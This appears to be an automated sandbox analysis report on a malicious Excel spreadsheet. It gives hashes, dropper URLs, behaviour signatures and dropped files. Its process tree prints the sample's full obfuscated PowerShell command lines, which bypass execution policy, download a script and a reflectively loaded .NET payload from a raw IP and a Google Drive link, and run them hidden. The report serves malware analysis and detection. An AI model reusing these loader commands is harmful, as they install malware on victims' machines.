Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    31/10/2024, 03:57

General

  • Target

    dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls

  • Size

    476KB

  • MD5

    4cbbf7815ee93202eb78ae0815ce9c2b

  • SHA1

    093f0bbc7422766b465332e1c8f608422e702329

  • SHA256

    dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1

  • SHA512

    790781e0a6dc840634f36fe5ef9863a1a0e31b471183968f401e757d2ad2d8010224abb98111a7e3d44f4d6d063b455c3f91edcdde34a364c52afa03ce3cca15

  • SSDEEP

    12288:skef66BBGRUdbU6jVzs6dDuipHJ30VQdB:G66iRU5U6jpdDtHt0aB

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2688
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
      "C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'JEhReHJKU2ZXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUkRFRkluaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl2Q2FjT3NiUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVEN2dHJKVElJcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHdUc0dkTE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXdMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAib1V1WXR5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpRFFLc1Z2b0pUUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSFF4ckpTZlc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82NS9zZWV0aGViZXN0aHRpbmdzd2l0aG1ld2hpY2hnaXZlZ3JlYXRvdXRwdXRvZm1lZ29vZC50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyIsMCwwKTtTdGFSdC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyI='+[cHar]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2404
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hhes_v5z.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF845.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF844.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:692
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1848
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERicsJ3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2904
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2304

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          1KB

          MD5

          67e486b2f148a3fca863728242b6273e

          SHA1

          452a84c183d7ea5b7c015b597e94af8eef66d44a

          SHA256

          facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

          SHA512

          d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          436B

          MD5

          971c514f84bba0785f80aa1c23edfd79

          SHA1

          732acea710a87530c6b08ecdf32a110d254a54c8

          SHA256

          f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

          SHA512

          43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          174B

          MD5

          e5f70e063a29b63a57fd63f1682245d8

          SHA1

          922ec2b51319fb35134cce1e8188b56cd0937d41

          SHA256

          d95db9305cc94e8760a784c46b6a40aa5a5352f0d6f16ca536471da124de2726

          SHA512

          132d4e5c471d7030b1367741eb2ff856f86a42cdcbfe6ed0cc26e7e65e78a6b94ae722e0091127f8fb56705f334fd97bb9d8d8185f38fd164ef3195975eae240

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          aad049801fbc889aafffe3b3eb96f85b

          SHA1

          ea931845bb062eb907d3354a4d09871b287a5d22

          SHA256

          035486c4c9a996e8d550142286d4eb95124af425bf55b9f3e4f19229ca1ee6e0

          SHA512

          336bda1bae16e90d360b3f2697817f9835da95e0a139243c51a01494061173a8f41a15067a2bfe83b93aa6bdfcc3748dd49423ab989908a3c635135954c67d4d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          170B

          MD5

          f9ac9f5a44d5bc7fe061af5181896c6e

          SHA1

          0f5257245a9274c710edb77217e5d7e99fee6c17

          SHA256

          110a34e78c5b8db16f1f5357d33854fdc604f54011d39a119b3e1707644af714

          SHA512

          934f31fe40c2ff8bc8fc6b266639bc91cb7eefaebee76490e38e596a3547b0fb87674347c78041ce5d43cd27fc32f98f76dc15a0d270237cea9bad279a6d6c9e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\creatednewthingsformee[1].hta

          Filesize

          8KB

          MD5

          6e717304324c95149d224a71e675b0a3

          SHA1

          204dc0fa81a68b0244a46ef0ed1f12389bcc2c65

          SHA256

          5f0a2146432d26f3c4b439f1be2a857b4af1ac5a601b135c00bc8a545374ac4d

          SHA512

          d03aea131d144f7e5328f69acc4a28f59ba182fccc3bc7292acc16ff4b886b7e61592d6931915742406f686a484445d00a0e8900bee24d541cf99a5b3d0245db

        • C:\Users\Admin\AppData\Local\Temp\CabEE64.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\RESF845.tmp

          Filesize

          1KB

          MD5

          d357105b4812c0d48344a3ec18502d44

          SHA1

          f03886c219e5fe33ac97b64548339cf8f114d4c0

          SHA256

          50e66ff1bc3779b6439bc9684d5f8ad9afbebd941f8b11bbaf3638db6bcc2dab

          SHA512

          d257462dcbcb3d4f017d79202768f94b40e05f9910a174fdbae080862cf43022bf69f458b2c65a9a600d75785de6d53a8f49acfd60af23d04782affe552d5f52

        • C:\Users\Admin\AppData\Local\Temp\hhes_v5z.dll

          Filesize

          3KB

          MD5

          be7a5a5b0d1dafb9d1d153e57bf04eac

          SHA1

          72c165793ed8f5e9cc938b782838123a07862b44

          SHA256

          7e551b61458a5925ca884416da116774f907f5f60b1c5ef6d332a0b11b9c5aae

          SHA512

          6053107a56d99c065883eb8bb91231932f5e34d36ba96ef6812923745ec0c3c2db1dbb6f1af24d520464ce0bf0e833c8cd255e8d2a35241854bd80851d162577

        • C:\Users\Admin\AppData\Local\Temp\hhes_v5z.pdb

          Filesize

          7KB

          MD5

          09e3ae58367a7bbb2ca01f8153ce78a5

          SHA1

          2ce49883471590fcece9c3a699aba0ff7007d9a5

          SHA256

          7bc16d51ca6edbc9ad2fb8e19d4be590fb39375a7aa4fbc4171be27c034ec959

          SHA512

          3f941642169169a81963011f5ca0180d77847fcad593ca4df56655e52bb7b908bd47620842614a1e13f430ac5bd3ae3b1f46cf1df1445ac04f1716bbcd91264e

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          e6a8cf52a28d759a8922ad9454306607

          SHA1

          36af4a24b9085c124c093a85afd1094e688a8bdf

          SHA256

          0c1cfd6ea375c4a058916f3d1cbd0ddbfa1bd267e0f3fc76ace97126811a59d1

          SHA512

          c5e85ab44a94ad72b2683a6d6c4ce062be982d8a6a5369e50dde5560f6d69ece08691bd5f966d69c7ee1a5cbf8ee2b8ec345d62cca7170c158cd2ebbd736529f

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          9b9fa7732759343724fbc283172bd021

          SHA1

          68c37153a46ddfa8e00e8e7fbe6931c3ba4b8d15

          SHA256

          748b22122b670fd3a5df87157a14637ecebb01e5e4cfc46785db9b3c646cb26f

          SHA512

          375f149cf7f3e70e2d2fdd4ce23ca3dfb028126dbb63d6214ad83ec5db1baada98672cdbb51e4901c0f3bc21aa3b442d7ee4abc15ff1537a07c5b388895d1882

        • C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

          Filesize

          137KB

          MD5

          4dd3d6eed0e1ade77fde299848078ef8

          SHA1

          75855bee75c0c52d00cad1897c381ffc6c706200

          SHA256

          9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305

          SHA512

          3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

        • \??\c:\Users\Admin\AppData\Local\Temp\CSCF844.tmp

          Filesize

          652B

          MD5

          fa61c06e7f91d77e94ae57bf46bf3500

          SHA1

          64c58f06a6d125da8bb10e3044103069fca3af7f

          SHA256

          d8426f4efb7020db186a00efc45566d40d6d19f705b2a1d84a2e667d57e83230

          SHA512

          af625d8057d8a2d73162798a770ecc3c906334b6b5624df4ddb8985819ccf7a32b67d86c5600685feea4c3c475f5015635bad588b41a9e96b033bcb7ac6af645

        • \??\c:\Users\Admin\AppData\Local\Temp\hhes_v5z.0.cs

          Filesize

          487B

          MD5

          9b8f2dee116254910197a8801c205862

          SHA1

          c4fddb1f937921b75c5c988cdb3f459faa446d52

          SHA256

          5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3

          SHA512

          00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

        • \??\c:\Users\Admin\AppData\Local\Temp\hhes_v5z.cmdline

          Filesize

          309B

          MD5

          3eb59cb2ade83138262d8f163e431635

          SHA1

          dfecd8372cb3e476b685b2d265b1ddd6c2c24787

          SHA256

          516296628652d04a94fe6d15025dcd0155f7363fb1038e139c166f34c46f1a61

          SHA512

          9f950f58979c1f352f6286d0c64f0d30ac052977fec54de740228619e6bee9f2848882ccd4c70c466f7b3827895e94530db0fd3d117943c8f32cd9235c3c4f02

        • memory/1404-18-0x0000000002620000-0x0000000002622000-memory.dmp

          Filesize

          8KB

        • memory/2688-19-0x00000000023B0000-0x00000000023B2000-memory.dmp

          Filesize

          8KB

        • memory/2688-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/2688-1-0x000000007276D000-0x0000000072778000-memory.dmp

          Filesize

          44KB

        • memory/2688-76-0x000000007276D000-0x0000000072778000-memory.dmp

          Filesize

          44KB